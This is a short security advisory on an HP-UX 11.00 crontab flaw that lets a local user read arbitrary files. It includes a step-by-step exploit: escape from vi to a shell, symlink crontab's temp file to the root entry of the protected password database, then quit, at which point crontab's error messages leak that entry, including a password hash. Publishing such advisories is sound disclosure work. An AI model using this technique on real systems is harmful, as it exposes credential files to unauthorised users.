|
|
| |
There is a vulnerability in crontab which allows users to read arbitrary local files without attaining root or file ownership privileges.
Note that not all local users can use crontab, but rather only those who are registered in crontab.allow file. |
| |
Credit:
The information has been provided by Kyong-won Cho.
|
| |
Using the crontab command with the -e option (crontab -e) executes the vi editor and a temporary file is created in /var/tmp/ . The owner of the file is a current user.
The attack is performed by exiting to a subshell using the '!sh' command in vi, linking the file created in /var/tmp/ and then exiting crontab. The error message appears with all the file names and details.
Example:
To display the contents of /tcb/files/auth/r/root
$ id
uid=101(dubhe) gid=101(swat)
$ uname -s -r
HP-UX B.11.00
$ crontab -e
...
...
~
"/var/tmp/aaaa25923"
### A file named /var/tmp/aaaa25923 is created
~
:!sh
### Exit to a subshell
$ ln -sf /tcb/files/auth/r/root /var/tmp/aaaa25923
$ exit
### Make a symlink and return to vi
[Hit return to continue]
:q!
### Quit vi
root:u_name=root:u_id#0:\
crontab: error on previous line; unexpected character found in line.
:u_pwd=Of2wgf6SCoIbQ:\
crontab: error on previous line; unexpected character found in line.
:u_bootauth:u_auditid#0:\
crontab: error on previous line; unexpected character found in line.
:u_auditflag#1:\
crontab: error on previous line; unexpected character found in line.
:u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock@:\
crontab: error on previous line; unexpected character found in line.
:chkent:
crontab: error on previous line; unexpected character found in line.
|
|
|
